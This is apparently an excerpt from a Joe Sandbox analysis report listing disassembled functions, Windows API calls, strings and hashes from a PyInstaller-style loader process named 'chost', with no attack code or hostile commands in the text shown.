Associated: 00000010.00000002.2391419544.00007FF69439E000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2391419544.00007FF6943A2000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2391492143.00007FF6943A4000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_7ff694360000_chost.jbxd

Similarity

API ID: FileFindFirst_invalid_parameter_noinfo
String ID:
API String ID: 2227656907-0
Opcode ID: 5fde642f47360a120b3bbdc49a752417dcdc94f7dd720a243365bab1f94d45be
Instruction ID: 372393b69a4ec3f3c56b15206987a8cba900712ea79a1b66b452bf340369e673
Opcode Fuzzy Hash: 5fde642f47360a120b3bbdc49a752417dcdc94f7dd720a243365bab1f94d45be
Instruction Fuzzy Hash: 64B1B722B1C68681EE719B73D4801B9A3A1EB95BE4F449179E99DC7B89EF3CE441C700

Function 00007FF694385EEC Relevance: 6.1, APIs: 4, Instructions: 143timeCOMMON

Download Yara Rule

APIs

_get_daylight.LIBCMT ref: 00007FF694385F1A

Part of subcall function 00007FF694385668: _invalid_parameter_noinfo.LIBCMT ref: 00007FF69438567C

_get_daylight.LIBCMT ref: 00007FF694385F2B

Part of subcall function 00007FF694385608: _invalid_parameter_noinfo.LIBCMT ref: 00007FF69438561C

_get_daylight.LIBCMT ref: 00007FF694385F3C

Part of subcall function 00007FF694385638: _invalid_parameter_noinfo.LIBCMT ref: 00007FF69438564C

Part of subcall function 00007FF69437A9B8: RtlFreeHeap.NTDLL(?,?,?,00007FF694382D92,?,?,?,00007FF694382DCF,?,?,00000000,00007FF694383295,?,?,?,00007FF6943831C7), ref: 00007FF69437A9CE
Part of subcall function 00007FF69437A9B8: GetLastError.KERNEL32(?,?,?,00007FF694382D92,?,?,?,00007FF694382DCF,?,?,00000000,00007FF694383295,?,?,?,00007FF6943831C7), ref: 00007FF69437A9D8

GetTimeZoneInformation.KERNEL32(?,?,?,?,?,?,?,?,?,00000000,?,00007FF69438617C), ref: 00007FF694385F63

Memory Dump Source

Source File: 00000010.00000002.2391331452.00007FF694361000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF694360000, based on PE: true

Associated: 00000010.00000002.2391291069.00007FF694360000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2391376200.00007FF69438B000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2391419544.00007FF69439E000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2391419544.00007FF6943A2000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2391492143.00007FF6943A4000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_7ff694360000_chost.jbxd

Similarity

API ID: _get_daylight_invalid_parameter_noinfo$ErrorFreeHeapInformationLastTimeZone
String ID:
API String ID: 3458911817-0
Opcode ID: 8084827ab6892e9bf44fc7ae7df730cc4e836e683a41a1d7f4ca7a201d78ec16
Instruction ID: 68bdfe0ab7c59c4bbe90852045afc8a49bb41bb64af145c24a555ec5f711f204
Opcode Fuzzy Hash: 8084827ab6892e9bf44fc7ae7df730cc4e836e683a41a1d7f4ca7a201d78ec16
Instruction Fuzzy Hash: EF513962A1864286E734EF33D8C15A9A661EB48794F44D17DEA4DC7B96DF3CE440CB40

Function 00007FF69436D080 Relevance: 6.0, APIs: 4, Instructions: 39timethreadCOMMON

Download Yara Rule

APIs

GetSystemTimeAsFileTime.KERNEL32 ref: 00007FF69436D0AC
GetCurrentThreadId.KERNEL32 ref: 00007FF69436D0BA
GetCurrentProcessId.KERNEL32 ref: 00007FF69436D0C6
QueryPerformanceCounter.KERNEL32 ref: 00007FF69436D0D6

Memory Dump Source

Source File: 00000010.00000002.2391331452.00007FF694361000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF694360000, based on PE: true

Associated: 00000010.00000002.2391291069.00007FF694360000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2391376200.00007FF69438B000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2391419544.00007FF69439E000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2391419544.00007FF6943A2000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2391492143.00007FF6943A4000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_7ff694360000_chost.jbxd

Similarity

API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
String ID:
API String ID: 2933794660-0
Opcode ID: c7e0dc91749b0d7e19b464317103f3c41f17e8dff95374d43b780ecdfe6bf67b
Instruction ID: 503c07c0820b53d4637b48a728f68b3aaecd8a7943a55627700934a713639fd3
Opcode Fuzzy Hash: c7e0dc91749b0d7e19b464317103f3c41f17e8dff95374d43b780ecdfe6bf67b
Instruction Fuzzy Hash: 80111F26B14B06CAEB10CB72E8952B933A4F719758F440E35EA6D867A4EF78D154C340

Function 00007FF6943834F0 Relevance: 1.3, APIs: 1, Instructions: 7memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32 ref: 00007FF6943834F4

Memory Dump Source

Source File: 00000010.00000002.2391331452.00007FF694361000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF694360000, based on PE: true

Associated: 00000010.00000002.2391291069.00007FF694360000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2391376200.00007FF69438B000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2391419544.00007FF69439E000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2391419544.00007FF6943A2000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2391492143.00007FF6943A4000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_7ff694360000_chost.jbxd

Similarity

API ID: HeapProcess
String ID:
API String ID: 54951025-0
Opcode ID: 39e33fd4700d97162abc6aa121af668d241eeaeaed41ff08026f27548e358ff0
Instruction ID: 65bcec95d053b05d47b5cd7ed53d91aaa360ce41da37f5e2ee36db1900e67bd2
Opcode Fuzzy Hash: 39e33fd4700d97162abc6aa121af668d241eeaeaed41ff08026f27548e358ff0
Instruction Fuzzy Hash: 7CB09220E07A02C2EE182B32ACC221822A4BF48710F9881BCC00CC0330DE2C20E6D700

Function 00007FF6943895E0 Relevance: .0, Instructions: 32COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000010.00000002.2391331452.00007FF694361000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF694360000, based on PE: true

Associated: 00000010.00000002.2391291069.00007FF694360000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2391376200.00007FF69438B000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2391419544.00007FF69439E000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2391419544.00007FF6943A2000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2391492143.00007FF6943A4000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_7ff694360000_chost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bcf48121633763fd2f6aa1741893fa818c421e56c797f7e3558f0bc07bbc94c0
Instruction ID: 7e97207ee9b0706e5e9f79474c0693ae9517648d66149c78d4342b4b26069c6b
Opcode Fuzzy Hash: bcf48121633763fd2f6aa1741893fa818c421e56c797f7e3558f0bc07bbc94c0
Instruction Fuzzy Hash: CBF044717182558ADBA88F69A44262977D0FB083D0F40C07DD689C3B44DE3C9061CF04

Function 00007FF694365820 Relevance: 229.6, APIs: 86, Strings: 45, Instructions: 400libraryloaderCOMMON

Download Yara Rule

APIs

GetProcAddress.KERNEL32(?,00007FF6943664BF,?,00007FF69436336E), ref: 00007FF694365830
GetLastError.KERNEL32(?,00007FF6943664BF,?,00007FF69436336E), ref: 00007FF694365842
GetProcAddress.KERNEL32(?,00007FF6943664BF,?,00007FF69436336E), ref: 00007FF694365879
GetLastError.KERNEL32(?,00007FF6943664BF,?,00007FF69436336E), ref: 00007FF69436588B
GetProcAddress.KERNEL32(?,00007FF6943664BF,?,00007FF69436336E), ref: 00007FF6943658A4
GetLastError.KERNEL32(?,00007FF6943664BF,?,00007FF69436336E), ref: 00007FF6943658B6
GetProcAddress.KERNEL32(?,00007FF6943664BF,?,00007FF69436336E), ref: 00007FF6943658CF
GetLastError.KERNEL32(?,00007FF6943664BF,?,00007FF69436336E), ref: 00007FF6943658E1
GetProcAddress.KERNEL32(?,00007FF6943664BF,?,00007FF69436336E), ref: 00007FF6943658FD
GetLastError.KERNEL32(?,00007FF6943664BF,?,00007FF69436336E), ref: 00007FF69436590F
GetProcAddress.KERNEL32(?,00007FF6943664BF,?,00007FF69436336E), ref: 00007FF69436592B
GetLastError.KERNEL32(?,00007FF6943664BF,?,00007FF69436336E), ref: 00007FF69436593D
GetProcAddress.KERNEL32(?,00007FF6943664BF,?,00007FF69436336E), ref: 00007FF694365959
GetLastError.KERNEL32(?,00007FF6943664BF,?,00007FF69436336E), ref: 00007FF69436596B
GetProcAddress.KERNEL32(?,00007FF6943664BF,?,00007FF69436336E), ref: 00007FF694365987
GetLastError.KERNEL32(?,00007FF6943664BF,?,00007FF69436336E), ref: 00007FF694365999
GetProcAddress.KERNEL32(?,00007FF6943664BF,?,00007FF69436336E), ref: 00007FF6943659B5
GetLastError.KERNEL32(?,00007FF6943664BF,?,00007FF69436336E), ref: 00007FF6943659C7

Strings

PyErr_Fetch, xrefs: 00007FF694365ABF, 00007FF694365AE1
PyObject_SetAttrString, xrefs: 00007FF694365D71, 00007FF694365D93
PyImport_AddModule, xrefs: 00007FF694365BD3, 00007FF694365BF5
Py_DecRef, xrefs: 00007FF694365826, 00007FF694365848
PyConfig_Clear, xrefs: 00007FF69436597D, 00007FF69436599F
PyObject_Str, xrefs: 00007FF694365D9F, 00007FF694365DC1
PyErr_NormalizeException, xrefs: 00007FF694365AED, 00007FF694365B0F
PySys_GetObject, xrefs: 00007FF694365E57, 00007FF694365E79
PyObject_CallFunctionObjArgs, xrefs: 00007FF694365D15, 00007FF694365D37
PyUnicode_Replace, xrefs: 00007FF694365FC7, 00007FF694365FE9
GetProcAddress, xrefs: 00007FF694365858
PyConfig_SetString, xrefs: 00007FF694365A35, 00007FF694365A57
PyUnicode_FromFormat, xrefs: 00007FF694365F3D, 00007FF694365F5F
PyConfig_Read, xrefs: 00007FF6943659D9, 00007FF6943659FB
Py_InitializeFromConfig, xrefs: 00007FF6943658F3, 00007FF694365915
PyObject_GetAttrString, xrefs: 00007FF694365D43, 00007FF694365D65
Failed to get address for %hs, xrefs: 00007FF694365851
Py_PreInitialize, xrefs: 00007FF69436594F, 00007FF694365971
PyImport_ImportModule, xrefs: 00007FF694365C2F, 00007FF694365C51
PyErr_Restore, xrefs: 00007FF694365B77, 00007FF694365B99
Py_DecodeLocale, xrefs: 00007FF69436586F, 00007FF694365891
PyRun_SimpleStringFlags, xrefs: 00007FF694365DFB, 00007FF694365E1D
Py_ExitStatusException, xrefs: 00007FF69436589A, 00007FF6943658BC
PyErr_Print, xrefs: 00007FF694365B49, 00007FF694365B6B
PyUnicode_DecodeFSDefault, xrefs: 00007FF694365F0F, 00007FF694365F31
Py_Finalize, xrefs: 00007FF6943658C5, 00007FF6943658E7
PyErr_Occurred, xrefs: 00007FF694365B1B, 00007FF694365B3D
PyUnicode_Decode, xrefs: 00007FF694365EE1, 00007FF694365F03
PyMem_RawFree, xrefs: 00007FF694365C8B, 00007FF694365CAD
PyMarshal_ReadObjectFromString, xrefs: 00007FF694365C5D, 00007FF694365C7F
PyConfig_SetWideStringList, xrefs: 00007FF694365A63, 00007FF694365A85
PyObject_CallFunction, xrefs: 00007FF694365CE7, 00007FF694365D09
PyConfig_SetBytesString, xrefs: 00007FF694365A07, 00007FF694365A29
PyStatus_Exception, xrefs: 00007FF694365E29, 00007FF694365E4B
PyEval_EvalCode, xrefs: 00007FF694365BA5, 00007FF694365BC7
PyUnicode_Join, xrefs: 00007FF694365F99, 00007FF694365FBB
PyImport_ExecCodeModule, xrefs: 00007FF694365C01, 00007FF694365C23
PyUnicode_FromString, xrefs: 00007FF694365F6B, 00007FF694365F8D
PyPreConfig_InitIsolatedConfig, xrefs: 00007FF694365DCD, 00007FF694365DEF
PyUnicode_AsUTF8, xrefs: 00007FF694365EB3, 00007FF694365ED5
Py_IsInitialized, xrefs: 00007FF694365921, 00007FF694365943
PyErr_Clear, xrefs: 00007FF694365A91, 00007FF694365AB3
PySys_SetObject, xrefs: 00007FF694365E85, 00007FF694365EA7
PyConfig_InitIsolatedConfig, xrefs: 00007FF6943659AB, 00007FF6943659CD
PyModule_GetDict, xrefs: 00007FF694365CB9, 00007FF694365CDB

Memory Dump Source

Source File: 00000010.00000002.2391331452.00007FF694361000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF694360000, based on PE: true

Associated: 00000010.00000002.2391291069.00007FF694360000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2391376200.00007FF69438B000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2391419544.00007FF69439E000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2391419544.00007FF6943A2000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2391492143.00007FF6943A4000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_7ff694360000_chost.jbxd

Similarity

API ID: AddressErrorLastProc
String ID: Failed to get address for %hs$GetProcAddress$PyConfig_Clear$PyConfig_InitIsolatedConfig$PyConfig_Read$PyConfig_SetBytesString$PyConfig_SetString$PyConfig_SetWideStringList$PyErr_Clear$PyErr_Fetch$PyErr_NormalizeException$PyErr_Occurred$PyErr_Print$PyErr_Restore$PyEval_EvalCode$PyImport_AddModule$PyImport_ExecCodeModule$PyImport_ImportModule$PyMarshal_ReadObjectFromString$PyMem_RawFree$PyModule_GetDict$PyObject_CallFunction$PyObject_CallFunctionObjArgs$PyObject_GetAttrString$PyObject_SetAttrString$PyObject_Str$PyPreConfig_InitIsolatedConfig$PyRun_SimpleStringFlags$PyStatus_Exception$PySys_GetObject$PySys_SetObject$PyUnicode_AsUTF8$PyUnicode_Decode$PyUnicode_DecodeFSDefault$PyUnicode_FromFormat$PyUnicode_FromString$PyUnicode_Join$PyUnicode_Replace$Py_DecRef$Py_DecodeLocale$Py_ExitStatusException$Py_Finalize$Py_InitializeFromConfig$Py_IsInitialized$Py_PreInitialize
API String ID: 199729137-653951865
Opcode ID: 3ca4f2c8e8fa74ff45c561f9825c8e8d27386d4e804e1314c270c66bff6859f6
Instruction ID: 3a5623702a2c4a47feeda6c6c4281f3a1de03cf2bc08da220e03fc71c303ca39
Opcode Fuzzy Hash: 3ca4f2c8e8fa74ff45c561f9825c8e8d27386d4e804e1314c270c66bff6859f6
Instruction Fuzzy Hash: 9A22B564A49B0781FA39DB77B8E557472A0EF14791F54D4BDD81EC2BA0EF3CA548D200

Function 00007FF6943681C0 Relevance: 24.6, APIs: 6, Strings: 8, Instructions: 117COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF694369400: MultiByteToWideChar.KERNEL32(?,?,?,00007FF6943645E4,00000000,00007FF694361985), ref: 00007FF694369439

ExpandEnvironmentStringsW.KERNEL32(?,00007FF6943688A7,?,?,00000000,00007FF694363CBB), ref: 00007FF69436821C

Part of subcall function 00007FF694362810: MessageBoxW.USER32 ref: 00007FF6943628EA

Strings

LOADER: runtime-tmpdir points to non-existent drive %ls (type: %d)!, xrefs: 00007FF69436828D
LOADER: failed to convert runtime-tmpdir to a wide string., xrefs: 00007FF6943681F3
CreateDirectory, xrefs: 00007FF69436836C
LOADER: failed to expand environment variables in the runtime-tmpdir., xrefs: 00007FF694368230
LOADER: failed to create runtime-tmpdir path %ls!, xrefs: 00007FF694368363
\, xrefs: 00007FF694368251
LOADER: failed to obtain the absolute path of the runtime-tmpdir., xrefs: 00007FF6943682C9
%.*s, xrefs: 00007FF6943682FC

Memory Dump Source

Source File: 00000010.00000002.2391331452.00007FF694361000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF694360000, based on PE: true

Associated: 00000010.00000002.2391291069.00007FF694360000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2391376200.00007FF69438B000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2391419544.00007FF69439E000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2391419544.00007FF6943A2000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2391492143.00007FF6943A4000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_7ff694360000_chost.jbxd

Similarity

API ID: ByteCharEnvironmentExpandMessageMultiStringsWide
String ID: %.*s$CreateDirectory$LOADER: failed to convert runtime-tmpdir to a wide string.$LOADER: failed to create runtime-tmpdir path %ls!$LOADER: failed to expand environment variables in the runtime-tmpdir.$LOADER: failed to obtain the absolute path of the runtime-tmpdir.$LOADER: runtime-tmpdir points to non-existent drive %ls (type: %d)!$\
API String ID: 1662231829-930877121
Opcode ID: e491f33a4545c5dc9e33b4da933e1c9d98f9a36929a11ac7b8a73595df86892f
Instruction ID: 19881956d4b0b640426b40011f359a08836b6217a42781f4b400ced101d51cec
Opcode Fuzzy Hash: e491f33a4545c5dc9e33b4da933e1c9d98f9a36929a11ac7b8a73595df86892f
Instruction Fuzzy Hash: 7A51A461A2D64381FB74AB37E8D26BA7260EF98784F54C579E90EC26D5EE2CE404C740

Function 00007FF694362180 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 120COMMON

Download Yara Rule

APIs

GetDC.USER32 ref: 00007FF6943621AB
SelectObject.GDI32 ref: 00007FF6943621F2
DrawTextW.USER32 ref: 00007FF694362215
SelectObject.GDI32 ref: 00007FF69436222B
ReleaseDC.USER32 ref: 00007FF69436223B
MoveWindow.USER32 ref: 00007FF69436228B
MoveWindow.USER32 ref: 00007FF6943622CB
MoveWindow.USER32 ref: 00007FF69436231E
MoveWindow.USER32 ref: 00007FF694362366

Strings

P%, xrefs: 00007FF6943621FF

Memory Dump Source

Source File: 00000010.00000002.2391331452.00007FF694361000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF694360000, based on PE: true

Associated: 00000010.00000002.2391291069.00007FF694360000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2391376200.00007FF69438B000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2391419544.00007FF69439E000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2391419544.00007FF6943A2000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2391492143.00007FF6943A4000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_7ff694360000_chost.jbxd

Similarity

API ID: MoveWindow$ObjectSelect$DrawReleaseText
String ID: P%
API String ID: 2147705588-2959514604
Opcode ID: 044398bc2faddcfc72e28419b1c607044beef288ba0900b5e0371f537bcab75f
Instruction ID: 877da75f18e5e8b3eee9767dd813e20d2e9a208c22d3939476ce08ce795968ee
Opcode Fuzzy Hash: 044398bc2faddcfc72e28419b1c607044beef288ba0900b5e0371f537bcab75f
Instruction Fuzzy Hash: 9551E726604BA186D6349F37E4581BAB7A1F798B61F008125EFDE83795DF3CD085DB10

Function 00007FF6943680B0 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 67COMMON

Download Yara Rule

APIs

GetWindowLongPtrW.USER32 ref: 00007FF6943680EF
GetWindowLongPtrW.USER32 ref: 00007FF69436816F
ShutdownBlockReasonCreate.USER32 ref: 00007FF694368182
GetLastError.KERNEL32 ref: 00007FF69436818C
SetWindowLongPtrW.USER32 ref: 00007FF6943681A3

Strings

Needs to remove its temporary files., xrefs: 00007FF694368175

Memory Dump Source

Source File: 00000010.00000002.2391331452.00007FF694361000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF694360000, based on PE: true

Associated: 00000010.00000002.2391291069.00007FF694360000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2391376200.00007FF69438B000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2391419544.00007FF69439E000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2391419544.00007FF6943A2000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2391492143.00007FF6943A4000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_7ff694360000_chost.jbxd

Similarity

API ID: LongWindow$BlockCreateErrorLastReasonShutdown
String ID: Needs to remove its temporary files.
API String ID: 3975851968-2863640275
Opcode ID: 1b4b32be61da5f45784fe9fe2f7d724fb74bbaf2a32eb33803c40e4204126e7e
Instruction ID: daa309e79a971a5938048be77156e171a5db39da0d2077ee6da1dba294006256
Opcode Fuzzy Hash: 1b4b32be61da5f45784fe9fe2f7d724fb74bbaf2a32eb33803c40e4204126e7e
Instruction Fuzzy Hash: C421A821B09A4382E7654B7BA8D5179A250EF88B94F588274EA3DC33E9DE2CD591C300

Function 00007FF694376300 Relevance: 14.5, APIs: 3, Strings: 5, Instructions: 494COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF694376343
_invalid_parameter_noinfo.LIBCMT ref: 00007FF694376730
_invalid_parameter_noinfo.LIBCMT ref: 00007FF6943769CC

Strings

:, xrefs: 00007FF6943764FC
p, xrefs: 00007FF6943763F5
p, xrefs: 00007FF69437646D
-, xrefs: 00007FF6943763D9
f, xrefs: 00007FF694376465

Memory Dump Source

Source File: 00000010.00000002.2391331452.00007FF694361000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF694360000, based on PE: true

Associated: 00000010.00000002.2391291069.00007FF694360000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2391376200.00007FF69438B000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2391419544.00007FF69439E000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2391419544.00007FF6943A2000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2391492143.00007FF6943A4000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_7ff694360000_chost.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID: -$:$f$p$p
API String ID: 3215553584-2013873522
Opcode ID: 75ce3dd5e90789a751ac91fed3db50e3550f512a2f4dec46f6fb30c565ad9a60
Instruction ID: bcb615e6d2dc45115b3c08d31e0f14b4923dc47681d1c97be12a33c3beecd11d
Opcode Fuzzy Hash: 75ce3dd5e90789a751ac91fed3db50e3550f512a2f4dec46f6fb30c565ad9a60
Instruction Fuzzy Hash: FB126C72A0C183C6FB749A2691A42B976A1FB50770F94C17DE6DAC6AC5DF3CE590CB00

Function 00007FF694371038 Relevance: 14.5, APIs: 3, Strings: 5, Instructions: 475COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF694371078
_invalid_parameter_noinfo.LIBCMT ref: 00007FF694371440
_invalid_parameter_noinfo.LIBCMT ref: 00007FF6943716DF

Strings

f, xrefs: 00007FF694371110
p, xrefs: 00007FF69437111D
p, xrefs: 00007FF694371182
f, xrefs: 00007FF6943712C5
f, xrefs: 00007FF69437117A

Memory Dump Source

Source File: 00000010.00000002.2391331452.00007FF694361000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF694360000, based on PE: true

Associated: 00000010.00000002.2391291069.00007FF694360000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2391376200.00007FF69438B000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2391419544.00007FF69439E000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2391419544.00007FF6943A2000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2391492143.00007FF6943A4000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_7ff694360000_chost.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID: f$f$p$p$f
API String ID: 3215553584-1325933183
Opcode ID: efdc55b57c7b5823aa39a5abe82f144bbffe385c3037011f7a836833ec2ff017
Instruction ID: 6c635943339b1005d1e5bfd80b3d1df99dec213bf81c3ee0982361b847a8193f
Opcode Fuzzy Hash: efdc55b57c7b5823aa39a5abe82f144bbffe385c3037011f7a836833ec2ff017
Instruction Fuzzy Hash: 1A126F33E0C183C6FF749A26E0946B966A1EB40754F988179E6D9C6BC4DF7CE884DB10

Function 00007FF694361050 Relevance: 14.1, APIs: 1, Strings: 7, Instructions: 119COMMON

Download Yara Rule

Strings

fseek, xrefs: 00007FF6943610D3
fread, xrefs: 00007FF6943611FD
Failed to extract %s: failed to seek to the entry's data!, xrefs: 00007FF6943610CC
Failed to extract %s: failed to open archive file!, xrefs: 00007FF694361098
Failed to extract %s: failed to read data chunk!, xrefs: 00007FF6943611F6
Failed to extract %s: failed to allocate data buffer (%u bytes)!, xrefs: 00007FF694361108
malloc, xrefs: 00007FF69436110F

Memory Dump Source

Source File: 00000010.00000002.2391331452.00007FF694361000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF694360000, based on PE: true

Associated: 00000010.00000002.2391291069.00007FF694360000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2391376200.00007FF69438B000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2391419544.00007FF69439E000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2391419544.00007FF6943A2000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2391492143.00007FF6943A4000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_7ff694360000_chost.jbxd

Similarity

API ID: CurrentProcess
String ID: Failed to extract %s: failed to allocate data buffer (%u bytes)!$Failed to extract %s: failed to open archive file!$Failed to extract %s: failed to read data chunk!$Failed to extract %s: failed to seek to the entry's data!$fread$fseek$malloc
API String ID: 2050909247-3659356012
Opcode ID: 8551cb8fd9aa33fa89974f2b8a72d226fc03734e6e735fe4479b0ef4aef6e1ff
Instruction ID: ec5b29f3ee001a00052139818e83dbfb05d0e20ceda91b008959f46fcfd6e79a
Opcode Fuzzy Hash: 8551cb8fd9aa33fa89974f2b8a72d226fc03734e6e735fe4479b0ef4aef6e1ff
Instruction Fuzzy Hash: B2415E21A0865382EA30DB33A8866B9B394FF45BC4F4484B9ED5DC7796DE3CE505CB40

Function 00007FF694361470 Relevance: 14.1, APIs: 1, Strings: 7, Instructions: 107COMMON

Download Yara Rule

Strings

fseek, xrefs: 00007FF6943614E5
fread, xrefs: 00007FF6943615E6
Failed to extract %s: failed to seek to the entry's data!, xrefs: 00007FF6943614DE
Failed to extract %s: failed to open archive file!, xrefs: 00007FF69436149F
Failed to extract %s: failed to read data chunk!, xrefs: 00007FF6943615DF
Failed to extract %s: failed to allocate data buffer (%u bytes)!, xrefs: 00007FF694361518
malloc, xrefs: 00007FF69436151F

Memory Dump Source

Source File: 00000010.00000002.2391331452.00007FF694361000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF694360000, based on PE: true

Associated: 00000010.00000002.2391291069.00007FF694360000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2391376200.00007FF69438B000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2391419544.00007FF69439E000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2391419544.00007FF6943A2000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2391492143.00007FF6943A4000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_7ff694360000_chost.jbxd

Similarity

API ID: CurrentProcess
String ID: Failed to extract %s: failed to allocate data buffer (%u bytes)!$Failed to extract %s: failed to open archive file!$Failed to extract %s: failed to read data chunk!$Failed to extract %s: failed to seek to the entry's data!$fread$fseek$malloc
API String ID: 2050909247-3659356012
Opcode ID: bfba3adfebe2dcdc93abc573ebea260fdba1b78c19a21fbbb5393bdda8e9346d
Instruction ID: fbe4bb88f423b63cf7ec68f3a98233567181d92f7e926d74c7dbaf814e6d0848
Opcode Fuzzy Hash: bfba3adfebe2dcdc93abc573ebea260fdba1b78c19a21fbbb5393bdda8e9346d
Instruction Fuzzy Hash: 73416D31A0868395EF20DB3394825B9B3A1EF44794F84C4BAEE4D87B96DE3CE505CB04

Function 00007FF69436EA78 Relevance: 12.6, APIs: 4, Strings: 3, Instructions: 310COMMON

Download Yara Rule

APIs

__FrameHandler3::GetHandlerSearchState.LIBVCRUNTIME ref: 00007FF69436EAD5

